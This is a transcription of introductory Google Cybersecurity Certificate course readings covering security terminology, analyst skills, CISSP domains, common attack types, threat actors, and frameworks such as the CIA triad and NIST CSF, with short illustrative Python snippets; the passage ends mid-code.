
Google Cybersecurity Certification - 8 Course Transcriptions

Google Cybersecurity Certification – 11/1/23
Common cybersecurity terminology
As you’ve learned, cybersecurity (also known as security) is the practice of ensuring confidentiality,
integrity, and availability of information by protecting networks, devices, people, and data from
unauthorized access or criminal exploitation. In this reading, you’ll be introduced to some key terms
used in the cybersecurity profession. Then, you’ll be provided with a resource that’s useful for staying
informed about changes to cybersecurity terminology.
There are many terms and concepts that are important for security professionals to know. Being
familiar with them can help you better identify the threats that can harm organizations and people alike.
A security analyst or cybersecurity analyst focuses on monitoring networks for breaches. They also help
develop strategies to secure an organization and research information technology (IT) security trends to
remain alert and informed about potential threats. Additionally, an analyst works to prevent incidents.
In order for analysts to effectively do these types of tasks, they need to develop knowledge of the
following key concepts.
Compliance is the process of adhering to internal standards and external regulations and enables
organizations to avoid fines and security breaches.
Security frameworks are guidelines used for building plans to help mitigate risks and threats to data and
privacy.
Security controls are safeguards designed to reduce specific security risks. They are used with security
frameworks to establish a strong security posture.
Security posture is an organization’s ability to manage its defense of critical assets and data and react to
change. A strong security posture leads to lower risk for the organization.
A threat actor, or malicious attacker, is any person or group who presents a security risk. This risk can
relate to computers, applications, networks, and data.
An internal threat can be a current or former employee, an external vendor, or a trusted partner who
poses a security risk. At times, an internal threat is accidental. For example, an employee who
accidentally clicks on a malicious email link would be considered an accidental threat. Other times, the
internal threat actor intentionally engages in risky activities, such as unauthorized data access.
Network security is the practice of keeping an organization's network infrastructure secure from
unauthorized access. This includes data, services, systems, and devices that are stored in an
organization’s network.
Cloud security is the process of ensuring that assets stored in the cloud are properly configured, or set
up correctly, and access to those assets is limited to authorized users. The cloud is a network made up of
a collection of servers or computers that store resources and data in remote physical locations known as
data centers that can be accessed via the internet. Cloud security is a growing subfield of cybersecurity
that specifically focuses on the protection of data, applications, and infrastructure in the cloud.
Programming is a process that can be used to create a specific set of instructions for a computer to
execute tasks. These tasks can include:
● Automation of repetitive tasks (e.g., searching a list of malicious domains)
● Reviewing web traffic
● Alerting on suspicious activity
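The first of these tasks can be sketched in a few lines of Python. The domain names below are hypothetical placeholders, not real threat intelligence, and a real team would pull the malicious list from a threat feed rather than hard-coding it:

```python
# Hypothetical set of known-malicious domains (placeholder values only).
MALICIOUS_DOMAINS = {"badsite.example", "phish.example", "malware.example"}

def find_malicious(observed_domains):
    """Return the observed domains that also appear on the malicious list."""
    return sorted(set(observed_domains) & MALICIOUS_DOMAINS)

observed = ["mail.example.org", "phish.example", "docs.example.com"]
print(find_malicious(observed))  # ['phish.example']
```

Automating a check like this means it can run on every new batch of logs instead of being done by hand.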
Key takeaways
Understanding key technical terms and concepts used in the security field will help prepare you for your
role as a security analyst. Knowing these terms can help you identify common threats, risks, and
vulnerabilities. To explore a variety of cybersecurity terms, visit the National Institute of Standards and
Technology glossary. Or use your browser to search for high-quality, reliable cybersecurity glossaries
from research institutes or governmental authorities. Glossaries are available in multiple languages.
Transferable skills from other backgrounds to cybersecurity
Communication
Communication is a transferable skill for a security analyst. They will often need to describe certain
threats, risks, or vulnerabilities to people who may not have a technical background. For example,
security analysts may be tasked with interpreting and communicating policies and procedures to other
employees. Or analysts may be asked to report findings to their supervisors, so the appropriate
actions can be taken to secure the organization.
Collaboration
Security analysts often work in teams with engineers, digital forensic investigators, and program
managers. For example, if you are working to roll out a new security feature, you will likely have a
project manager, an engineer, and an ethical hacker on your team. Security analysts also need to be able
to analyze complex scenarios that they may encounter. For example, a security analyst may need to
make recommendations about how different tools can support efficiency and safeguard an
organization's internal network.
Problem Solving
Identifying a security problem and then diagnosing it and providing solutions is a necessary skill to
keep business operations safe. Understanding threat actors and identifying trends can provide insight
on how to handle future threats.
Technical skills needed include programming languages such as Python and SQL, and knowledge of
SIEM tools and resources used to handle security incidents.
Transferable and technical cybersecurity skills
Previously, you learned that cybersecurity analysts need to develop certain core skills to be successful at
work. Transferable skills are skills from other areas of study or practice that can apply to different
careers. Technical skills may apply to several professions, as well; however, they typically require
knowledge of specific tools, procedures, and policies. In this reading, you’ll explore both transferable
skills and technical skills further.
Transferable skills
You have probably developed many transferable skills through life experiences; some of those skills will
help you thrive as a cybersecurity professional. These include:
● Communication: As a cybersecurity analyst, you will need to communicate and collaborate with
others. Understanding others’ questions or concerns and communicating information clearly to
individuals with technical and non-technical knowledge will help you mitigate security issues
quickly.
● Problem-solving: One of your main tasks as a cybersecurity analyst will be to proactively identify
and solve problems. You can do this by recognizing attack patterns, then determining the most
efficient solution to minimize risk. Don't be afraid to take risks and try new things. Also,
understand that it's rare to find a perfect solution to a problem. You’ll likely need to
compromise.
● Time management: Having a heightened sense of urgency and prioritizing tasks appropriately is
essential in the cybersecurity field. Effective time management will help you minimize
potential damage and risk to critical assets and data by keeping you focused on the most
urgent issues.
● Growth mindset: This is an evolving industry, so an important transferable skill is a willingness
to learn. Technology moves fast, and that's a great thing! It doesn't mean you will need to learn it
all, but it does mean that you’ll need to continue to learn throughout your career. Fortunately,
you will be able to apply much of what you learn in this program to your ongoing professional
development.
● Diverse perspectives: The only way to go far is together. By encouraging diverse perspectives
and mutual respect, you’ll undoubtedly find more and better solutions to security problems.
Technical skills
There are many technical skills that will help you be successful in the cybersecurity field. You’ll learn
and practice these skills as you progress through the certificate program. Some of the tools and concepts
you’ll need to use and be able to understand include:
● Programming languages: By understanding how to use programming languages, cybersecurity
analysts can automate tasks that would otherwise be very time consuming. Examples of tasks
that programming can be used for include searching data to identify potential threats or
organizing and analyzing information to identify patterns related to security issues.
● Security information and event management (SIEM) tools: SIEM tools collect and analyze log
data, or records of events such as unusual login behavior, and support analysts’ ability to
monitor critical activities in an organization. This helps cybersecurity professionals identify and
analyze potential security threats, risks, and vulnerabilities more efficiently.
● Intrusion detection systems (IDSs): Cybersecurity analysts use IDSs to monitor system activity
and alerts for possible intrusions. It’s important to become familiar with IDSs because they’re a
key tool that every organization uses to protect assets and data. For example, you might use an
IDS to monitor networks for signs of malicious activity, like unauthorized access to a network.
● Threat landscape knowledge: Being aware of current trends related to threat actors, malware, or
threat methodologies is vital. This knowledge allows security teams to build stronger defenses
against threat actor tactics and techniques. By staying up to date on attack trends and patterns,
security professionals are better able to recognize when new types of threats emerge, such as a
new ransomware variant.
● Incident response: Cybersecurity analysts need to be able to follow established policies and
procedures to respond to incidents appropriately. For example, a security analyst might receive
an alert about a possible malware attack, then follow the organization’s outlined procedures to
start the incident response process. This could involve conducting an investigation to identify
the root issue and establishing ways to remediate it.
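As a rough illustration of the SIEM idea described above, the sketch below scans a few log lines for repeated failed logins. The key=value log format, the usernames, and the alert threshold are all invented for this example; real SIEM tools ingest structured logs from many sources at far larger scale:

```python
from collections import Counter

# Hypothetical log lines in an invented key=value format.
log_lines = [
    "2023-11-01 09:02:11 user=amal action=login status=FAIL",
    "2023-11-01 09:02:15 user=amal action=login status=FAIL",
    "2023-11-01 09:02:19 user=amal action=login status=FAIL",
    "2023-11-01 09:05:40 user=jori action=login status=SUCCESS",
]

def failed_login_counts(lines):
    """Count failed login attempts per user."""
    counts = Counter()
    for line in lines:
        # Skip the date and time tokens, then parse the key=value fields.
        fields = dict(token.split("=") for token in line.split()[2:])
        if fields.get("action") == "login" and fields.get("status") == "FAIL":
            counts[fields["user"]] += 1
    return counts

# Flag any user with three or more failed logins as unusual behavior.
alerts = [user for user, n in failed_login_counts(log_lines).items() if n >= 3]
print(alerts)  # ['amal']
```

The point is the pattern, not the parser: collect events, aggregate them, and alert when a threshold of suspicious activity is crossed.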
CompTIA Security+
In addition to gaining skills that will help you succeed as a cybersecurity professional, the Google
Cybersecurity Certificate helps prepare you for the CompTIA Security+ exam, the industry-leading
certification for cybersecurity roles. You’ll earn a dual credential when you complete both, which can be
shared with potential employers. After completing all eight courses in the Google Cybersecurity
Certificate, you will unlock a 30% discount for the CompTIA Security+ exam and additional practice
materials.
Key takeaways
Understanding the benefits of core transferable and technical skills can help prepare you to successfully
enter the cybersecurity workforce. Throughout this program, you’ll have multiple opportunities to
develop these and other key cybersecurity analyst skills.
As we've discussed, security professionals protect many physical and digital assets. These skills are
desired by organizations and government entities because risk needs to be managed. Let's continue
to discuss why security matters. Security is essential for ensuring an organization's business
continuity and ethical standing. There are both legal implications and moral considerations to
maintaining an organization's security. A data breach, for example, affects everyone that is
associated with the organization. This is because data losses or leaks can affect an organization's
reputation as well as the lives and reputations of their users, clients, and customers. By maintaining
strong security measures, organizations can increase user trust. This may lead to financial growth
and ongoing business referrals. As previously mentioned, organizations are not the only ones that
suffer during a data breach. Maintaining and securing user, customer, and vendor data is an
important part of preventing incidents that may expose people's personally identifiable
information. Personally identifiable information, known as PII, is any information used to infer an
individual's identity. PII includes someone's full name,
date of birth, physical address, phone number, email address, internet protocol (IP) address, and
similar information. Sensitive personally identifiable information, known as SPII, is a specific type
of PII that falls under stricter handling guidelines and may include social security numbers,
medical or financial information, and biometric data, such as facial recognition. If SPII is stolen,
this has the potential to be significantly more damaging to an individual than if PII is stolen. PII and
SPII data are key assets that a threat actor will look for if an organization experiences a breach.
When a person's identifiable information is compromised, leaked, or stolen, identity theft is the
primary concern. Identity theft is the act of stealing personal information to commit fraud while
impersonating a victim. And the primary objective of identity theft is financial gain. We've explored
several reasons why security matters. Employers need security analysts like you to fill the current
and future demand to protect data, products, and people while ensuring confidentiality, integrity,
and safe access to information. This is why the U.S. Bureau of Labor Statistics expects the demand
for security professionals to grow by more than 30% by the year 2030.
Terms and definitions from Course 1, Module 1
Cybersecurity (or security): The practice of ensuring confidentiality, integrity, and
availability of information by protecting networks, devices, people, and data from
unauthorized access or criminal exploitation
Cloud security: The process of ensuring that assets stored in the cloud are properly
configured and access to those assets is limited to authorized users
Internal threat: A current or former employee, external vendor, or trusted partner who
poses a security risk
Network security: The practice of keeping an organization's network infrastructure secure
from unauthorized access
Personally identifiable information (PII): Any information used to infer an individual’s
identity
Security posture: An organization’s ability to manage its defense of critical assets and data
and react to change
Sensitive personally identifiable information (SPII): A specific type of PII that falls under
stricter handling guidelines
Technical skills: Skills that require knowledge of specific tools, procedures, and policies
Threat: Any circumstance or event that can negatively impact assets
Threat actor: Any person or group who presents a security risk
Transferable skills: Skills from other areas that can apply to different careers
Course 2
Common attacks and their effectiveness
Previously, you learned about past and present attacks that helped shape the cybersecurity
industry. These included the LoveLetter attack, also called the ILOVEYOU virus, and the
Morris worm. One outcome was the establishment of response teams, which are now
commonly referred to as computer security incident response teams (CSIRTs). In this
reading, you will learn more about common methods of attack. Becoming familiar with
different attack methods, and the evolving tactics and techniques threat actors use, will
help you better protect organizations and people.
Phishing
Phishing is the use of digital communications to trick people into revealing sensitive data or
deploying malicious software.
Some of the most common types of phishing attacks today include:
● Business Email Compromise (BEC): A threat actor sends an email message that
seems to be from a known source to make a seemingly legitimate request for
information, in order to obtain a financial advantage.
● Spear phishing: A malicious email attack that targets a specific user or group of
users. The email seems to originate from a trusted source.
● Whaling: A form of spear phishing. Threat actors target company executives to gain
access to sensitive data.
● Vishing: The exploitation of electronic voice communication to obtain sensitive
information or to impersonate a known source.
● Smishing: The use of text messages to trick users, in order to obtain sensitive
information or to impersonate a known source.
Malware
Malware is software designed to harm devices or networks. There are many types of
malware. The primary purpose of malware is to obtain money, or in some cases, an
intelligence advantage that can be used against a person, an organization, or a territory.
Some of the most common types of malware attacks today include:
● Viruses: Malicious code written to interfere with computer operations and cause
damage to data and software. A virus needs to be initiated by a user (i.e., a threat
actor), who transmits the virus via a malicious attachment or file download. When
someone opens the malicious attachment or download, the virus hides itself in other
files in the now infected system. When the infected files are opened, it allows the
virus to insert its own code to damage and/or destroy data in the system.
● Worms: Malware that can duplicate and spread itself across systems on its own. In
contrast to a virus, a worm does not need to be downloaded by a user. Instead, it
self-replicates and spreads from an already infected computer to other devices on
the same network.
● Ransomware: A malicious attack where threat actors encrypt an organization's data
and demand payment to restore access.
● Spyware: Malware that’s used to gather and sell information without consent.
Spyware can be used to access devices. This allows threat actors to collect personal
data, such as private emails, texts, voice and image recordings, and locations.
Social Engineering
Social engineering is a manipulation technique that exploits human error to gain private
information, access, or valuables. Human error is usually a result of trusting someone
without question. It’s the mission of a threat actor, acting as a social engineer, to create an
environment of false trust and lies to exploit as many people as possible.
Some of the most common types of social engineering attacks today include:
● Social media phishing: A threat actor collects detailed information about their target
from social media sites. Then, they initiate an attack.
● Watering hole attack: A threat actor attacks a website frequently visited by a specific
group of users.
● USB baiting: A threat actor strategically leaves a malware USB stick for an employee
to find and install, to unknowingly infect a network.
● Physical social engineering: A threat actor impersonates an employee, customer, or
vendor to obtain unauthorized access to a physical location.
Social engineering principles
Social engineering is incredibly effective. This is because people are generally trusting and
conditioned to respect authority. The number of social engineering attacks is increasing
with every new social media application that allows public access to people's data.
Although sharing personal data—such as your location or photos—can be convenient, it’s
also a risk.
Reasons why social engineering attacks are effective include:
● Authority: Threat actors impersonate individuals with power. This is because
people, in general, have been conditioned to respect and follow authority figures.
● Intimidation: Threat actors use bullying tactics. This includes persuading and
intimidating victims into doing what they’re told.
● Consensus/Social proof: Because people sometimes do things that they believe many
others are doing, threat actors use others’ trust to pretend they are legitimate. For
example, a threat actor might try to gain access to private data by telling an
employee that other people at the company have given them access to that data in
the past.
● Scarcity: A tactic used to imply that goods or services are in limited supply.
● Familiarity: Threat actors establish a fake emotional connection with users that can
be exploited.
● Trust: Threat actors establish an emotional relationship with users that can be
exploited over time. They use this relationship to develop trust and gain personal
information.
● Urgency: A threat actor persuades others to respond quickly and without
questioning.
Key takeaways
In this reading, you learned about some common attacks and their impacts. You also
learned about social engineering and why it’s so successful. While this is only a brief
introduction to attack types, you will have many opportunities throughout the program to
further develop your understanding of how to identify and defend against cybersecurity
attacks.
As the tactics of threat actors evolve, so do the roles of security professionals. Having a solid
understanding of core security concepts will support your growth in this field. One way to better
understand these core concepts is by organizing them into categories, called security domains.
As of 2022, CISSP has defined eight domains to organize the work of security professionals.
It's important to understand that these domains are related and that gaps in one domain can result in
negative consequences to an entire organization. It's also important to understand the domains because
it may help you better understand your career goals and your role within an organization.
As you learn more about the elements of each domain, the work involved in one may appeal to you more
than the others. This domain may become a career path for you to explore further.
CISSP defines eight domains in total, and we'll discuss all eight between this video and the next.
In this video, we're going to cover the first four: security and risk management, asset security,
security architecture and engineering, and communication and network security. Let's start with the first
domain, security and risk management. Security and risk management focuses on defining security goals
and objectives, risk mitigation, compliance, business continuity, and the law.
For example, security analysts may need to update company policies related to private health
information if a change is made to a federal compliance regulation such as the Health Insurance
Portability and Accountability Act, also known as HIPAA.
The second domain is asset security. This domain focuses on securing digital and physical assets. It's also
related to the storage, maintenance, retention, and destruction of data. When working with this domain,
security analysts may be tasked with making sure that old equipment is properly disposed of
and destroyed, including any type of confidential information.
The third domain is security architecture and engineering. This domain focuses on optimizing data
security by ensuring effective tools, systems, and processes are in place. As a security analyst, you may
be tasked with configuring a firewall. A firewall is a device used to monitor and filter incoming
and outgoing computer network traffic. Setting up a firewall correctly helps prevent attacks that could
affect productivity.
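A firewall's core filtering behavior can be pictured as a rule list checked in order. The rules, port numbers, and deny-by-default policy below are invented for illustration; real firewalls match on many more fields (addresses, protocols, connection state) and are configured through their own interfaces rather than coded like this:

```python
# Hypothetical, greatly simplified packet-filter rules: each rule matches a
# destination port and states whether matching traffic is allowed or denied.
RULES = [
    {"port": 443, "action": "allow"},  # HTTPS
    {"port": 22,  "action": "allow"},  # SSH
    {"port": 23,  "action": "deny"},   # Telnet
]
DEFAULT_ACTION = "deny"  # deny-by-default is the usual secure posture

def filter_packet(dest_port):
    """Return the action of the first rule matching dest_port."""
    for rule in RULES:
        if rule["port"] == dest_port:
            return rule["action"]
    return DEFAULT_ACTION

print(filter_packet(443), filter_packet(23), filter_packet(8080))
# allow deny deny
```

The deny-by-default fallback is the important design choice: traffic that no rule explicitly permits is blocked.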
The fourth security domain is communication and network security. This domain focuses on managing
and securing physical networks and wireless communications. As a security analyst, you may be asked
to analyze user behavior within your organization. Imagine discovering that users are connecting to
unsecured wireless hotspots. This could leave the organization and its employees vulnerable to attacks.
The next four security domains are: identity and access management, security assessment and
testing, security operations, and software development security.
Familiarizing yourself with these domains will allow you to navigate the complex world of security.
The domains outline and organize how a team of security professionals work together. Depending on
the organization, analyst roles may sit at the intersection of multiple domains or focus on one specific
domain. Knowing where a particular role fits within the security landscape will help you prepare for job
interviews and work as part of a full security team.
Let's move into the fifth domain: identity and access management.
Identity and access management focuses on keeping data secure, by ensuring users follow established
policies to control and manage physical assets, like office spaces, and logical assets, such as networks
and applications. Validating the identities of employees and documenting access roles are essential to
maintaining the organization's physical and digital security. For example, as a security analyst, you may
be tasked with setting up employees' keycard access to buildings.
The sixth domain is security assessment and testing.
This domain focuses on conducting security control testing, collecting and analyzing data, and
conducting security audits to monitor for risks, threats, and vulnerabilities. Security analysts may
conduct regular audits of user permissions, to make sure that users have the correct level of access. For
example, access to payroll information is often limited to certain employees, so
analysts may be asked to regularly audit permissions to ensure that no unauthorized person
can view employee salaries.
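The payroll audit described above can be sketched as a comparison between an access list and an approved list. All names and resources here are hypothetical:

```python
# Hypothetical access-control data: only members of the payroll team should
# be able to view salary data.
PAYROLL_TEAM = {"dana", "ravi"}
access_list = {"salary_report": ["dana", "ravi", "guest"]}

def audit_permissions(resource, allowed_users):
    """Return users with access to resource who are not on the allowed list."""
    return sorted(set(access_list.get(resource, [])) - allowed_users)

print(audit_permissions("salary_report", PAYROLL_TEAM))  # ['guest']
```

Running a check like this on a schedule is one way analysts catch permissions that were granted and never revoked.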
The seventh domain is security operations. This domain focuses on conducting
investigations and implementing preventative measures. Imagine that you, as a security analyst, receive
an alert that an unknown device has been connected to your internal network.
You would need to follow the organization's policies and procedures to quickly stop the potential threat.
The final, eighth domain is software development security.
This domain focuses on using secure coding practices, which are a set of recommended guidelines that
are used to create secure applications and services.
A security analyst may work with software development teams to ensure
security practices are incorporated into the software development life-cycle. If, for example,
one of your partner teams is creating a new mobile app, then you may be asked to
advise on the password policies or ensure that any user data is
properly secured and managed.
Password attack
A password attack is an attempt to access password-secured devices, systems, networks, or
data. Some forms of password attacks that you’ll learn about later in the certificate
program are:
● Brute force
● Rainbow table
Password attacks fall under the communication and network security domain.
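To make the brute-force idea concrete, here is a minimal sketch. The PIN, its hash, and the tiny 4-digit search space are invented for illustration; real systems defend against this with rate limiting, salting, and deliberately slow hash functions:

```python
import hashlib
from itertools import product

# Hypothetical stored credential: the SHA-256 hash of a 4-digit PIN.
stored_hash = hashlib.sha256(b"7351").hexdigest()

def brute_force_pin(target_hash):
    """Try every 4-digit PIN until one hashes to the target."""
    for digits in product("0123456789", repeat=4):
        guess = "".join(digits)
        if hashlib.sha256(guess.encode()).hexdigest() == target_hash:
            return guess
    return None  # no match in the search space

print(brute_force_pin(stored_hash))  # 7351
```

A rainbow table attack trades this repeated hashing for lookups in a precomputed table of hash chains, which is why salting stored hashes is a standard defense.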
Social engineering attack
Social engineering is a manipulation technique that exploits human error to gain private
information, access, or valuables. Some forms of social engineering attacks that you will
continue to learn about throughout the program are:
● Phishing
● Smishing
● Vishing
● Spear phishing
● Whaling
● Social media phishing
● Business Email Compromise (BEC)
● Watering hole attack
● USB (Universal Serial Bus) baiting
● Physical social engineering
Social engineering attacks are related to the security and risk management domain.
Physical attack
A physical attack is a security incident that affects not only digital but also physical
environments where the incident is deployed. Some forms of physical attacks are:
● Malicious USB cable
● Malicious flash drive
● Card cloning and skimming
Physical attacks fall under the asset security domain.
Adversarial artificial intelligence
Adversarial artificial intelligence is a technique that manipulates artificial intelligence and
machine learning technology to conduct attacks more efficiently. Adversarial artificial
intelligence falls under both the communication and network security and the identity and
access management domains.
Supply-chain attack
A supply-chain attack targets systems, applications, hardware, and/or software to locate a
vulnerability where malware can be deployed. Because every item sold undergoes a
process that involves third parties, a security breach can occur at any
point in the supply chain. These attacks are costly because they can affect multiple
organizations and the individuals who work for them. Supply-chain attacks can fall under
several domains, including but not limited to the security and risk management, security
architecture and engineering, and security operations domains.
Cryptographic attack
A cryptographic attack affects secure forms of communication between a sender and
intended recipient. Some forms of cryptographic attacks are:
● Birthday
● Collision
● Downgrade
Cryptographic attacks fall under the communication and network security domain.
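The birthday attack listed above relies on the birthday paradox: collisions among random n-bit hash values become likely after only about 2^(n/2) attempts, far fewer than the 2^n possible outputs. A small calculation, using the standard approximation and a toy 32-bit hash size chosen purely for illustration, shows the effect:

```python
import math

def collision_probability(num_hashes, output_bits):
    """Approximate probability that at least two of num_hashes random hash
    values collide in a space of 2**output_bits (the birthday bound)."""
    space = 2.0 ** output_bits
    # Standard approximation: 1 - exp(-k(k-1) / (2N)).
    return 1.0 - math.exp(-num_hashes * (num_hashes - 1) / (2.0 * space))

# A toy 32-bit hash has about 4.3 billion possible outputs, yet roughly
# 80,000 hashes already give better-than-even odds of a collision.
print(round(collision_probability(80_000, 32), 2))  # 0.53
```

This is why hash functions used in security contexts need output sizes large enough that 2^(n/2) work is still out of reach.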
Key takeaways
The eight CISSP security domains can help an organization and its security team fortify
against and prepare for a data breach. Data breaches range from simple to complex and fall
under one or more domains. Note that the methods of attack discussed are only a few of
many. These and other types of attacks will be discussed throughout the certificate
program.
Resources for more information
To view detailed information and definitions of terms covered in this reading, visit the
National Institute of Standards and Technology (NIST) glossary.
Pro tip: If you cannot find a term in the NIST glossary, enter the appropriate search term
(e.g., “cybersecurity birthday attack”) into your preferred search engine to locate the
definition in another reliable source such as a .edu or .gov site.
Understand attackers
Previously, you were introduced to the concept of threat actors. As a reminder, a threat actor is any
person or group who presents a security risk. In this reading, you’ll learn about different types of threat
actors. You will also learn about their motivations, intentions, and how they’ve influenced the security
industry.
Threat actor types
Advanced persistent threats
Advanced persistent threats (APTs) have significant expertise accessing an organization's network
without authorization. APTs tend to research their targets (e.g., large corporations or government
entities) in advance and can remain undetected for an extended period of time. Their intentions and
motivations can include:
● Damaging critical infrastructure, such as the power grid and natural resources
● Gaining access to intellectual property, such as trade secrets or patents
Insider threats
Insider threats abuse their authorized access to obtain data that may harm an organization. Their
intentions and motivations can include:
● Sabotage
● Corruption
● Espionage
● Unauthorized data access or leaks
Hacktivists
Hacktivists are threat actors that are driven by a political agenda. They abuse digital technology to
accomplish their goals, which may include:
● Demonstrations
● Propaganda
● Social change campaigns
● Fame
Hacker types
A hacker is any person who uses computers to gain access to computer systems, networks, or data. They
can be beginner or advanced technology professionals who use their skills for a variety of reasons. There
are three main categories of hackers:
● Authorized hackers are also called ethical hackers. They follow a code of ethics and adhere to
the law to conduct organizational risk evaluations. They are motivated to safeguard people and
organizations from malicious threat actors.
● Semi-authorized hackers are considered researchers. They search for vulnerabilities but don’t
take advantage of the vulnerabilities they find.
● Unauthorized hackers are also called unethical hackers. They are malicious threat actors who do
not follow or respect the law. Their goal is to collect and sell confidential data for financial gain.
Note: There are multiple hacker types that fall into one or more of these three categories.
New and unskilled threat actors have various goals, including:
● To learn and enhance their hacking skills
● To seek revenge
● To exploit security weaknesses by using existing malware, programming scripts, and other
tactics
Other types of hackers are not motivated by any particular agenda other than completing the job they
were contracted to do. These types of hackers can be considered unethical or ethical hackers. They have
been known to work on both illegal and legal tasks for pay.
There are also hackers who consider themselves vigilantes. Their main goal is to protect the world from
unethical hackers.
Key takeaways
Threat actors and hackers are technically skilled individuals. Understanding their motivations and
intentions will help you be better prepared to protect your organization and the people it serves from
malicious attacks carried out by some of these individuals and groups.
Resources for more information
To learn more about how security teams work to keep organizations and people safe, explore the
Hacking Google series of videos.
Glossary terms from module 2
Terms and definitions from Course 1, Module 2
Adversarial artificial intelligence (AI): A technique that manipulates artificial intelligence (AI) and
machine learning (ML) technology to conduct attacks more efficiently
Business Email Compromise (BEC): A type of phishing attack where a threat actor impersonates a known
source to obtain financial advantage
Computer virus: Malicious code written to interfere with computer operations and cause damage to data
and software
Cryptographic attack: An attack that affects secure forms of communication between a sender and
intended recipient
Hacker: Any person who uses computers to gain access to computer systems, networks, or data
Malware: Software designed to harm devices or networks
Password attack: An attempt to access password-secured devices, systems, networks, or data
Phishing: The use of digital communications to trick people into revealing sensitive data or deploying
malicious software
Physical attack: A security incident that affects not only digital but also physical environments where the
incident is deployed
Physical social engineering: An attack in which a threat actor impersonates an employee, customer, or
vendor to obtain unauthorized access to a physical location
Social engineering: A manipulation technique that exploits human error to gain private information,
access, or valuables
Social media phishing: A type of attack where a threat actor collects detailed information about their
target on social media sites before initiating the attack
Spear phishing: A malicious email attack targeting a specific user or group of users, appearing to
originate from a trusted source
Supply-chain attack: An attack that targets systems, applications, hardware, and/or software to locate a
vulnerability where malware can be deployed
USB baiting: An attack in which a threat actor strategically leaves a malware USB stick for an employee to find and plug in, unknowingly infecting a network
Virus: Refer to “computer virus”
Vishing: The exploitation of electronic voice communication to obtain sensitive information or to
impersonate a known source
Watering hole attack: A type of attack when a threat actor compromises a website frequently visited by a
specific group of users
Security Frameworks and Controls
Imagine you're working as a security analyst and receive multiple alerts about suspicious
activity on the network. You realize that you'll need to implement additional security
measures to keep these alerts from becoming serious incidents. But where do you start? As an
analyst, you'll start by identifying your organization's critical assets and risks. Then you'll
implement the necessary frameworks and controls. In this video, we'll discuss how security
professionals use frameworks to continuously identify and manage risk. We'll also cover how to use
security controls to manage or reduce specific risks. Security frameworks are guidelines used for
building plans to help mitigate risks and threats to data and privacy. Security frameworks provide a
structured approach to implementing a security lifecycle. The security lifecycle is a constantly
evolving set of policies and standards that define how an organization
manages risks, follows established guidelines, and meets regulatory compliance, or laws. There are
several security frameworks that may be used to manage different types of organizational and
regulatory compliance risks. The purposes of security frameworks include protecting personally
identifiable information, known as PII; securing financial information; identifying security
weaknesses; managing organizational risks; and aligning security with business goals. Frameworks
have four core components, and understanding them will allow you to better manage potential
risks.
The first core component is identifying and documenting security goals. For example, an
organization may have a goal to align with the E.U.'s General Data Protection Regulation, also
known as GDPR. GDPR is a data protection law established to grant European citizens more control
over their personal data. A security analyst may be asked to identify and document areas where an
organization is out of compliance with GDPR.
The second core component is setting guidelines to achieve security goals. For example, when
implementing guidelines to achieve GDPR compliance, your organization may need to develop new
policies for how to handle data requests from individual users.
The third core component of security frameworks is implementing strong security processes. In the
case of GDPR, a security analyst working for a social media company may help design procedures to
ensure the organization complies with verified user data requests. An example of this type of
request is when a user attempts to update or delete their profile information.
The last core component of security frameworks is monitoring and communicating results. As an
example, you may monitor your organization's internal network and report a potential security
issue affecting GDPR to your manager or regulatory compliance officer. Now that we've introduced
the four core components
of security frameworks, let's tie them all together.
Frameworks allow analysts to work alongside other members of the security team to document,
implement, and use the policies and procedures that have been created. It's essential for an entry-level analyst to understand this process because it directly affects the work they do and how they
collaborate with others. Next, we'll discuss security controls. Security controls are safeguards
designed to reduce specific security risks. For example, your company may have a guideline that
requires all employees to complete a privacy training to reduce the risk of data breaches. As a
security analyst, you may use a software tool to automatically assign and track which employees
have completed this training. Security frameworks and controls are vital to managing security for
all types of organizations and ensuring that everyone is doing their part to maintain a low level of
risk. Understanding their purpose and how they are used allows analysts to support an
organization's security goals and protect the people it serves. In the following videos, we'll discuss
some well-known frameworks and principles that analysts need to be aware of to minimize risk
and protect data and users.
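The kind of control described in this section, a tool that tracks which employees have completed required privacy training, can be sketched in a few lines of Python. This is a minimal illustration with hypothetical employee names, not any specific product:

```python
# Minimal sketch of a security control: tracking which employees
# have completed a required privacy training. Names are hypothetical.

def outstanding_training(employees, completed):
    """Return employees who still need to finish the training."""
    return sorted(set(employees) - set(completed))

employees = ["ana", "ben", "carol", "deepak"]
completed = ["ben", "carol"]

print(outstanding_training(employees, completed))  # → ['ana', 'deepak']
```

In practice an analyst would pull these lists from an HR system and a training platform, but the control itself is the same comparison: who is required, minus who has complied.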
The CIA triad is a foundational model that helps inform how organizations consider risk when
setting up systems and security policies. CIA stands for confidentiality, integrity, and availability.
Confidentiality means that only authorized users can access specific assets or data. For example,
strict access controls that define who should and should not have access to data must be put in
place to ensure confidential data remains safe. Integrity means the data is correct, authentic, and
reliable. To maintain integrity, security professionals can use a form of data protection like
encryption to safeguard data from being tampered with. Availability means data is accessible to
those who are authorized to access it. Let's define a term that came up during our discussion of the
CIA triad: asset. An asset is an item perceived as having value to an organization. And value is
determined by the cost associated with the asset in question. For example, an application that
stores sensitive data, such as social security numbers or bank accounts, is a valuable asset to an
organization. It carries more risk and therefore requires tighter security controls in comparison to
a website that shares publicly available news content. As you may remember, earlier in the course,
we discussed frameworks and controls in general. Now, we'll discuss a specific framework
developed by the U.S.-based National Institute of Standards and Technology: the Cybersecurity
Framework, also referred to as the NIST CSF. The NIST Cybersecurity Framework is a voluntary
framework that consists of standards, guidelines, and best practices to manage cybersecurity risk.
It's important to become familiar with this framework because security teams use it as a baseline to
manage short and long-term risk. Managing and mitigating risks and protecting an organization's
assets from threat actors are key goals for security professionals. Understanding the different
motives a threat actor may have, alongside identifying your organization's most valuable assets is
important. Some of the most dangerous threat actors to consider are disgruntled employees. They
are the most dangerous because they often have access to sensitive information and know where to
find it. In order to reduce this type of risk, security professionals would use the principle of
confidentiality, as well as organizational guidelines based on frameworks to ensure staff members can
only access the data they need to perform their jobs. Threat actors originate from all across the
globe, and a diverse workforce of security professionals helps organizations identify attackers'
intentions. A variety of perspectives can assist organizations in understanding and mitigating the
impact of malicious activity. That concludes our introduction to the CIA triad and NIST CSF
framework, which are used to develop processes to secure organizations and the people they serve.
You may be asked in an interview if you know about security frameworks and principles. Or you
may be asked to explain how they're used to secure organizational assets. In either case,
throughout this program, you'll have multiple opportunities to learn more about them and apply
what we've discussed to real-world situations.
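The confidentiality principle covered above, where only authorized users can access specific assets, can be sketched as a simple access check. The users, assets, and access list below are hypothetical, and real access control systems are far more involved:

```python
# Hypothetical access-control list mapping assets to authorized users.
ACL = {
    "payroll_db": {"hr_admin", "payroll_admin"},
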